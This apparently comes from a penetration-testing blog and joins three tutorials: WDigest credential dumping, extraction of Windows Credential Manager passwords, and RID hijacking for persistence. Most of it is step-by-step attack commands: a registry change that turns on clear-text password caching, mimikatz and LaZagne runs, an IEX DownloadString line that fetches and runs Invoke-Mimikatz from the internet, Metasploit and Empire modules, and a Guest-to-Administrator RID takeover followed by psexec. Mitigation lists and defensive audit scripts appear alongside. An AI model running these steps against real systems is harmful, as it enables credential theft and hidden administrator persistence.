Credential Dumping: Wdigest


This is our third article in the Credential Dumping series. In this article, we will manipulate WDigest.dll in order to retrieve the system credentials. The methods used in this article apply to both internal and external penetration testing.

Table of Contents:
·         Introduction to WDigest
·         Working of WDigest.dll
·         Manual
·         PowerShell
·         PowerShell via Meterpreter
·         Metasploit Framework
·         PowerShell Empire
·         Mitigation
·         TL;DR

Introduction to WDigest
WDigest.dll was introduced with Windows XP and was designed specifically for HTTP and SASL authentication. Its job was to send confirmation of secret keys in order to authenticate the client to those protocols. Because it is a challenge/response protocol too, the security attributes of the NTLM protocol were applied to this DLL. WDigest is enabled by default from Windows XP through Windows 8.0 and from Windows Server 2003 through Windows Server 2012, which allows credentials to be kept in clear text in LSASS memory. Windows 10, Windows Server 2012 R2 and Windows Server 2016 do not have this protocol active by default, and Microsoft also released a patch for the earlier versions.

Working of WDigest.dll
Since WDigest is a challenge/response protocol, it is important to understand how such protocols work. They require a validating server that issues a challenge containing unpredictable data. A key is derived from the user's password and used to encrypt the challenge, which produces the response. A trusted service can then validate the user by computing the expected response itself and comparing it with the encrypted response received from the client; if the two match, the user is authenticated.

Now that we understand what the WDigest protocol is and how it works, let's get to the practical part: how to exploit it.
Manual
Our first method of exploiting WDigest to dump the desired credentials is manual. Such a method comes in handy in white-box pentesting. In this method, download mimikatz and run the following commands:
privilege::debug
sekurlsa::wdigest

As you can see, the above commands bore no fruit because the WDigest protocol wasn't active. To activate it, use the following command:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

The above command creates a DWORD value named UseLogonCredential under the WDigest key in the registry and sets it to 1, as you can see in the image below:

The above step has just enabled WDigest on the system, which allows the password to be kept in memory, and in clear text at that. These passwords can now be retrieved quietly, as you will see further on in this article.
For now, we need to apply the policy change we just made in the registry using the following command:
gpupdate /force

Now, if you launch mimikatz and run the following commands, you will have the credentials:
privilege::debug
sekurlsa::wdigest

PowerShell
In this method, we will invoke PowerShell scripts on the system, which will help us get our hands on the credentials. Simply launch a PowerShell prompt and run the following commands:

Import-Module .\WdigestDowngrade.ps1
Invoke-WdigestDowngrade
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
Once the above commands have executed successfully, run the following command to dump the credentials:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

And as you can see, we got the credentials.
PowerShell via Meterpreter
reg enumkey -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
load powershell
powershell_import /root/Desktop/Invoke-WdigestDowngrade.ps1
powershell_execute Invoke-WdigestDowngrade

The above commands create the UseLogonCredential value as required; you can then launch mimikatz to dump the credentials using the following commands:
load powershell
powershell_import /root/Invoke-Mimikatz.ps1
powershell_execute Invoke-Mimikatz -DumpCreds

Metasploit Framework
Our next method is an excellent way to dump the credentials remotely, which is often a requirement in grey-box pentesting. Once you have a Meterpreter session via Metasploit, remember to background the session; you can then run the wdigest_caching post module to make the same change to the WDigest key that we made manually in the previous method, using the following commands:
use post/windows/manage/wdigest_caching
set session 1
run

Then load the kiwi extension to dump the credentials. To do so, type:
load kiwi
creds_wdigest
And yes, we have our credentials.
PowerShell Empire
When you have an agent in Empire, use the wdigest_downgrade post-exploitation module to create the UseLogonCredential value under the WDigest key and set it to 1, with the help of the following commands:
usemodule management/wdigest_downgrade*
execute

Once the above module has executed successfully, you can use another built-in post-exploitation module to dump the credentials with the following commands:
usemodule credentials/mimikatz/logonpasswords*
execute


And after executing the above commands, you have the credentials.
Mitigation
Following are the steps one can take to secure a system against this scenario:
·         Make sure there is no UseLogonCredential value set under the WDigest key on your systems.
·         If you are using older versions of Windows, make sure Windows is updated with the patch.
·         The UseLogonCredential registry value should be set to 0 to completely disable this protocol.
·         Regularly check the registry value to make sure you have not been the victim of this change.
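To check whether a host is in the state the manual method above creates, and to act on the last two mitigation bullets, here is an added audit script (my own example, not code from the original article). It assumes the version boundary noted in the comments is correct and, for the event lookup, that Sysmon is installed (that part is simply empty otherwise).

```powershell
# Added example: audit the WDigest setting this article toggles and flag/fix clear-text caching.
# Not code from the original post. Run in an elevated PowerShell on the host being checked.
$Remediate  = $false   # set to $true to force UseLogonCredential to 0
$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Get-WDigestState {
    $value = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    $os = [Version](Get-CimInstance Win32_OperatingSystem).Version
    # Assumption: on builds older than 6.3 (Windows 8.1 / Server 2012 R2) credentials are
    # cached in clear text unless the value is explicitly 0, even with the patch installed;
    # on 6.3 and later an absent value means caching is off.
    $legacy = $os -lt [Version]'6.3'
    $risky  = if ($null -eq $value) { $legacy } else { $value -ne 0 }
    $shown  = if ($null -eq $value) { '(absent)' } else { $value }
    [pscustomobject]@{
        OSVersion          = $os
        UseLogonCredential = $shown
        ClearTextCaching   = $risky
    }
}

function Get-WDigestTamperEvents {
    # Sysmon Event ID 13 (RegistryEvent: value set) shows which process changed the value.
    # Returns nothing when Sysmon is not installed or has no matching events.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'WDigest\\UseLogonCredential' } |
        Select-Object TimeCreated,
            @{ n = 'Image';   e = { if ($_.Message -match 'Image:\s*(.+)')   { $Matches[1].Trim() } } },
            @{ n = 'Details'; e = { if ($_.Message -match 'Details:\s*(.+)') { $Matches[1].Trim() } } }
}

$state = Get-WDigestState
$state | Format-List
if ($state.ClearTextCaching) {
    Write-Warning 'WDigest is caching logon credentials in clear text in LSASS on this host.'
    if ($Remediate) {
        Set-ItemProperty -Path $WDigestKey -Name UseLogonCredential -Value 0 -Type DWord
        Write-Host 'UseLogonCredential set to 0. Credentials already cached stay in LSASS until those users log off.'
    }
}
Get-WDigestTamperEvents | Format-Table -AutoSize
```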

TL;DR
Understanding the very basics of your operating system, such as Windows, allows you to be more secure. Knowing how endpoints are put together to work for your convenience is important, because a seemingly minor change can make you vulnerable: WDigest keeps passwords in memory in clear text, which puts the user's credentials at risk. That is what led us to take a stab at credential dumping by manipulating WDigest. With mimikatz, the Metasploit framework and the other tools mentioned above, credentials can be harvested both locally and remotely, and an attacker can then use them to their advantage. An attacker who obtains administrator privileges on your system can modify the registry value and dump the credentials as shown in this article using mimikatz, Metasploit, Empire and PowerShell scripts.

Credential Dumping: Credential Manager


In this article, we learn how to dump system credentials by exploiting Credential Manager. We will cover various methods that can be used in both internal and external penetration testing.
Table of Contents:
·         Introduction to Credential Manager
·         Accessing Credential Manager
·         Metasploit
·         Empire
·         CredentialFileView
·         PowerShell
·         Mitigation
·         Conclusion

Introduction to Credential Manager
Credential Manager was introduced with Windows 7. It is like a digital vault that keeps all of your credentials safe. The credentials are stored in a Credentials folder, which you will find at %SystemDrive%\Users\<username>\AppData\Local\Microsoft\Credentials; it is this folder that Credential Manager accesses. It also allows you to add, edit, delete, back up and even restore the passwords.
Credentials saved in Credential Manager are of two types:
·         Web credentials: As Edge and Windows are products of the same company, Credential Manager also has access to the credentials stored by the Edge browser, to keep those saved credentials safe. It also stores the passwords of other Microsoft applications such as Skype, Microsoft Office, etc.

·         Windows credentials: Under this category, all the Windows login credentials can be found, along with those of any system in the network you have connected to.
Applications run by Windows that have your credentials saved will automatically have them stored in Credential Manager. Even when you update them, the change is noted and updated in Credential Manager too.
Accessing Credential Manager
To access Credential Manager, you can simply search for it in the Start menu, or you can use one of the following two methods:
·         Open Control Panel > User Accounts > Credential Manager
·         Use the command line with the vaultcmd command and its parameters.
When you connect to another system in the network, using any method, as in the following image:



and, while connecting, you provide the password and choose to store it for later use, then these credentials are saved in Credential Manager.



Irrespective of the website and its security, when you save a password in Edge or any other application such as Skype or Outlook, that password too gets saved in Credential Manager. For instance, we stored a Gmail password in our practical, as shown in the image below:



You can confirm from the following image that the password has indeed been saved.



Now, when you access Credential Manager by any method, you will find that all the system and network passwords are stored under the Windows Credentials tab.



And under the Web Credentials tab you will find the applications' passwords and the passwords saved in Edge.
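The two tabs described above can also be inventoried from the command line, which is useful when enforcing the "do not save passwords" mitigation across a fleet. This is an added read-only example (not code from the original article) that parses the output of cmdkey /list for the Windows Credentials vault and of vaultcmd for the Web Credentials vault; the line labels it matches are those printed on English-language Windows and are an assumption for other locales. It lists targets and user names only, never passwords.

```powershell
# Added example: inventory what Credential Manager holds, without reading any secrets.
# Not code from the original post; run as the user whose vault you want to review.
function Get-WindowsCredentialInventory {
    # cmdkey /list prints one block per entry: "Target: ...", "Type: ...", "User: ..."
    $entry = $null
    foreach ($line in (cmdkey /list)) {
        if ($line -match '^\s*Target:\s*(.+)$') {
            if ($entry) { $entry }                      # emit the previous block
            $entry = [pscustomobject]@{ Vault = 'Windows'; Target = $Matches[1].Trim(); Type = ''; User = '' }
        } elseif ($entry -and $line -match '^\s*Type:\s*(.+)$') { $entry.Type = $Matches[1].Trim() }
        elseif ($entry -and $line -match '^\s*User:\s*(.+)$') { $entry.User = $Matches[1].Trim() }
    }
    if ($entry) { $entry }
}

function Get-WebCredentialInventory {
    # vaultcmd prints "Resource: <url>" and "Identity: <account>" lines for each web credential
    # (assumed output format of vaultcmd /listcreds on an English locale)
    $entry = $null
    foreach ($line in (vaultcmd /listcreds:"Web Credentials" /all)) {
        if ($line -match '^\s*Resource:\s*(.+)$') {
            if ($entry) { $entry }
            $entry = [pscustomobject]@{ Vault = 'Web'; Target = $Matches[1].Trim(); Type = 'Web Password'; User = '' }
        } elseif ($entry -and $line -match '^\s*Identity:\s*(.+)$') { $entry.User = $Matches[1].Trim() }
    }
    if ($entry) { $entry }
}

$inventory = @(Get-WindowsCredentialInventory) + @(Get-WebCredentialInventory)
$inventory | Sort-Object Vault, Target | Format-Table -AutoSize

# Entries for other machines (TERMSRV/ for Remote Desktop, "Domain Password" type for SMB and
# similar logons) are exactly what the dumps later in this article recover, so call them out.
$inventory |
    Where-Object { $_.Target -match 'TERMSRV' -or $_.Type -eq 'Domain Password' } |
    ForEach-Object { Write-Warning "Saved network logon: $($_.Target) as $($_.User)" }
```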



Metasploit
All these credentials can be dumped with simple methods. Once you have a session through Metasploit, all you have to do is upload mimikatz and run it. Mimikatz is an excellent credential dumping tool; we have covered it in detail in one of our previous articles, which you can read here.
To run mimikatz remotely through the Metasploit session, use the following commands:
upload /root/Desktop/mimikatz.exe
shell
cd
mimikatz.exe



Once mimikatz executes successfully, you will get the credentials from Credential Manager, as shown in the image above.

Empire
Similarly, while using Empire, you can dump the credentials by downloading LaZagne.exe directly onto the target system and then running it to collect all the credentials. LaZagne is one of the best credential dumping tools; we have covered it in detail in one of our previous articles, which you can read here.
Use the following commands to dump the credentials with this method:
shell wget
shell dir
shell ./lazagne.exe all



After executing the commands, you can see that the passwords have been retrieved, as shown in the following image:



CredentialFileView
Our next method uses a third-party tool, CredentialFileView. This tool is very effective for internal penetration testing. To use it, simply download and launch it. After launching, it will ask you for the Windows password.



Once you provide the password, it will give you all the credentials you need, as shown in the image below:



Windows PowerShell
This method of password dumping can prove useful in both internal and external pentesting. In this method you have to run a script in Windows PowerShell; you will find the script here. Once you run the script, you will have all the web credentials, as shown in the image below:



You can also use PowerShell remotely to dump credentials with the help of Metasploit. It is very simple: you just have to run the following combination of commands once you have your session:
load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials



And just like that, with the help of PowerShell commands, you have the desired credentials.
Mitigation
Following are the measures you can take to keep your passwords safe:
·         DO NOT save passwords on your system, in your browser or in any other application.
·         Use different passwords for every account.
·         If you have trouble remembering passwords, then instead of keeping them in clear text on your system, use an online password manager to keep them safe.
·         Use the latest version of the operating system and applications.
·         Manually go to the login page instead of following a link.
·         Keep the firewall and Defender enabled.
·         Keep your employees/employers aware.

Conclusion
As you have noticed from our article, even though the Credential Manager feature provided by Windows is convenient, it is not secure: once an attacker has access to your system, these credentials are waiting to be theirs, as there is no additional security layer around Credential Manager. It is important to be aware of every feature your operating system provides, so that you can protect yourself. Hence, it is important to know how to access Credential Manager, how to operate it, and how it can be exploited.
We live in a cyber-active world where there are login credentials for everything, and one can't remember every credential. Credential Manager is a utility that makes this easy for us and takes on the responsibility of saving the passwords; but at what expense?
We at Hacking Articles want to request everyone to stay at home and self-quarantine to prevent the spread of Covid-19. Take care, be healthy and keep hacking!

Persistence: RID Hijacking


In this post, we discuss RID hijacking, which is considered a persistence technique in terms of the cyber kill chain, and you will learn multiple ways to perform it.

Table of Contents
Introduction
·         FSMO roles
·         SID & RID
·         Syntax
·         Important key points
RID Hijacking
·         Metasploit
·         Empire


Introduction
Microsoft divided the responsibilities of a domain controller into FSMO roles that together make up a full AD system. FSMO (Flexible Single Master Operation) comprises 5 roles across forest and domain:
·         Schema Master (one per forest)
·         Domain Naming Master (one per forest)
·         Relative identifier (RID) Master (one per domain)
·         Primary Domain Controller (PDC) Emulator (one per domain)
·         Infrastructure Master (one per domain)
SID & RID
The RID (Relative Identifier) is the last part of the SID (Security Identifier) and must be unique for a particular object within a domain. Each security principal has a unique SID that is issued by a security agent; the agent can be the Windows local system or a domain. The agent generates the SID when the security principal is created. The SID can be represented as a character string or as a structure.




Syntax
Syntax: S-[Revision]-[IdentifierAuthority]-[SubAuthority0]-[SubAuthority1]-...-[SubAuthority[SubAuthorityCount]](-RID)
e.g. S-1-5-21-1543651058-3042185658-368006193-1001




Important key points
·         The revision is always 1 for current NT versions.
·         When a new issuing authority is established under Windows (for example, a new computer is deployed or a domain is established), a SID with an arbitrary value of 5 is allocated as the identifier authority.
·         A constant value of 21 is used as the first sub-authority, marking the root of this group of sub-authorities, and a 96-bit random number is generated and parcelled out to the next three sub-authorities, each receiving a 32-bit chunk.
·         If the new issuing authority under which this SID was created is a domain, this SID is referred to as the "domain SID".
·         Windows allocates RIDs starting at 1,000; RIDs with a value of less than 1,000 are reserved and are used for special accounts.
·         For example, all Windows accounts with a RID of 500 are the built-in Administrator accounts of their respective issuing authorities.



RID Hijacking
'RID Hijacking' is a tactic an adversary uses to persist inside a victim's system by assigning the RID of the Administrator account to the Guest account or another local account. Creating persistence on the victim's system allows the adversary to establish a foothold, continuously regaining access unseen by you, and lets the hijacker log on as an authorised account that they have hijacked.
Thus, for this you need a privileged account session, as we have in the image below, to establish persistent access.




RID Hijacking: Metasploit
So, as you know, we had a Meterpreter session with admin privileges, and Metasploit provides a module to create persistence on the victim's machine by hijacking the RID of the Administrator user.
This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine. Taking advantage of some Windows Local Users Management integrity issues, this module will allow you to authenticate with one known account's credentials (like the GUEST account) and access with the privileges of another existing account (like the ADMINISTRATOR account), even if the spoofed account is disabled.
use post/windows/manage/rid_hijack
set getsystem true
set guest_account true
set session 2
set password 123
exploit

Once you run the module, it checks the state of the Guest account; if it is found disabled, it first activates the account and then overwrites the RID value from 501 to 500, i.e. the RID of the Administrator account.



As you have seen in the above step, the RID of Guest is now 500 and the password is 123; thus, if we log in as Guest, we should get an administrator-privileged CMD on the target machine. Here we use the impacket toolkit to get a CMD shell on the remote machine.
cd /impacket/example
./psexec.py Guest:123@192.168.1.107

As you can observe, we have obtained a CMD shell as "nt authority\system", i.e. CMD as the administrator account.




RID Hijacking: Empire
RID hijacking is also possible using Empire, but this module is not available in the Empire project; you need to clone the module from GitHub.

Once both programs are downloaded, copy the Invoke-RIDHijacking.ps1 file from /RID-Hijacking/modules/empire/data/module_source/persistence into /root/Empire/data/module_source/persistence:
cd RID-Hijacking/modules/empire/data/module_source/persistence
cp Invoke-RIDHijacking.ps1 /root/Empire/data/module_source/persistence



Also copy rid_hijack.py from /RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated into /root/Empire/lib/modules/powershell/persistence/elevated:
cd RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated
cp rid_hijack.py /root/Empire/lib/modules/powershell/persistence/elevated



Once you are done with the configuration, launch the module to start the attack; it initialises just like the Metasploit module. It first identifies the state of the Guest account and then hijacks RID 500 for the Guest user.
usemodule persistence/elevated/rid_hijack*
set UserGuest True
set Password 123
set Enable True
execute



Again, repeat the above psexec.py step to connect to the CMD of the victim's machine and confirm that you have a privileged shell.
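Both the Metasploit module and its Empire port leave the same trace: the Guest record in the SAM still lives under its real key (000001F5), but the RID stored inside that record now says 500. The following is an added detection check written from the defender's side (not code from the article, the Metasploit module or the Empire port). It must run as SYSTEM because the SAM hive's ACL denies even administrators, and it assumes the published layout of SAM user records: the RID the hijack rewrites at offset 0x30 of the F value, and the account name's offset and byte length at offsets 0x0C and 0x10 of the V value (offset relative to 0xCC).

```powershell
# Added example: detect RID hijacking by comparing each local account's real RID (the hex
# name of its SAM key) with the RID stored inside its F value, which the hijack overwrites.
# Not code from the original post. Run as SYSTEM, e.g. psexec -s powershell.exe.
# Assumed SAM layout: RID at F[0x30..0x33]; V[0x0C] holds the name offset (relative to 0xCC)
# and V[0x10] the name length in bytes (UTF-16LE).
function Get-RidHijackFindings {
    $usersKey = 'HKLM:\SAM\SAM\Domains\Account\Users'
    foreach ($key in Get-ChildItem -Path $usersKey -ErrorAction Stop) {
        if ($key.PSChildName -eq 'Names') { continue }       # Names is the name index, not a record
        $keyRid = [Convert]::ToUInt32($key.PSChildName, 16)  # e.g. 000001F5 -> 501 (Guest)
        $props  = Get-ItemProperty -Path $key.PSPath
        if (-not $props.F -or $props.F.Length -lt 0x34) { continue }
        $fRid = [BitConverter]::ToUInt32($props.F, 0x30)     # RID the logon token will carry
        $name = '(unknown)'
        if ($props.V -and $props.V.Length -ge 0x14) {
            $off = [int][BitConverter]::ToUInt32($props.V, 0x0C) + 0xCC
            $len = [int][BitConverter]::ToUInt32($props.V, 0x10)
            if ($off + $len -le $props.V.Length) {
                $name = [Text.Encoding]::Unicode.GetString($props.V, $off, $len)
            }
        }
        [pscustomobject]@{
            Account      = $name
            KeyRid       = $keyRid
            EffectiveRid = $fRid
            Hijacked     = ($keyRid -ne $fRid)
        }
    }
}

$findings = @(Get-RidHijackFindings)
$findings | Format-Table -AutoSize
$hijacked = $findings | Where-Object { $_.Hijacked }
if ($hijacked) {
    # After the Metasploit/Empire step above, Guest (key 000001F5) shows EffectiveRid 500 here.
    $detail = ($hijacked | ForEach-Object { "$($_.Account) (key RID $($_.KeyRid) -> $($_.EffectiveRid))" }) -join ', '
    Write-Warning "RID mismatch on: $detail"
} else {
    Write-Host 'No RID mismatch found.'
}
```

A mismatch is the thing to alert on; restoring the original RID and re-disabling the account, then rotating the Administrator password, is the cleanup the finding calls for.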
 




https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164